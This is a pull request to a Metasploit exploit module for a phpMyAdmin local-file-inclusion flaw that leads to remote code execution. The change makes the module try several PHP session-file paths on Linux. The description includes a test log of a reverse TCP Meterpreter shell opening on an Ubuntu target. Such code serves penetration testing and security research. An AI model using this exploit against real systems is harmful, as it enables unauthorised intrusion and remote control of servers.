### PR TITLE
Additional path for Linux target

### DIFF
--- a/modules/exploits/multi/http/phpmyadmin_lfi_rce.rb
+++ b/modules/exploits/multi/http/phpmyadmin_lfi_rce.rb
@@ -39,8 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote
         [
           [ 'Automatic', {} ],
           [ 'Windows', {} ],
-          [ 'Linux', {} ],
-          [ 'Linux / php5', {} ]
+          [ 'Linux', {} ]
         ],
       'DefaultTarget'  => 0,
       'DisclosureDate' => 'Jun 19 2018'))
@@ -212,22 +211,22 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::UnexpectedReply, "#{peer} - Failed to find data directory")
     end
 
+    paths = []
     #Creating include path
     if mytarget == 'Windows'
       #Table file location
-      data_path = $1.gsub(/\\/, '/')
-      data_path = data_path.sub(/^.*?\//, '/')
-      data_path << "#{database}/#{table}.frm"
-    elsif mytarget == 'Linux'
+      tmp_path = $1.gsub(/\\/, '/')
+      tmp_path = tmp_path.sub(/^.*?\//, '/')
+      tmp_path << "#{database}/#{table}.frm"
+      paths.append(tmp_path)
+    else
       #Session path location
       /phpMyAdmin=(?<session_name>.*?);/ =~ cookies
-      data_path = "/var/lib/php/sessions/sess_#{session_name}"
-    else
-      /phpMyAdmin=(?<session_name>.*?);/ =~ cookies
-      data_path = "/var/lib/php5/sess_#{session_name}"
+      paths.append("/var/lib/php/sessions/sess_#{session_name}")
+      paths.append("/var/lib/php5/sess_#{session_name}")
     end
 
-    res = lfi(uri, data_path, cookies, token)
+    paths.each {|data_path| lfi(uri, data_path, cookies, token)}
 
     #Drop database
     res = query(uri, dropsql, cookies, token)


### PR DESCRIPTION
Use an array for file paths to check.

I verified that the exploit still works on Ubuntu. My Ubuntu test system has the `/var/lib/php/sessions/sess_` file path.

```
msf5 exploit(multi/http/phpmyadmin_lfi_rce) > run

[*] Started reverse TCP handler on 172.22.222.197:4444 
[*] Sending stage (37775 bytes) to 172.22.222.193
[*] Meterpreter session 1 opened (172.22.222.197:4444 -> 172.22.222.193:55486) at 2018-08-24 07:26:30 -0500
[-] 172.22.222.193:80 - Failed to drop database etbul. Might drop when your session closes.

meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 4.15.0-32-generic #35-Ubuntu SMP Fri Aug 10 17:58:07 UTC 2018 x86_64
Meterpreter : php/linux
meterpreter > 
```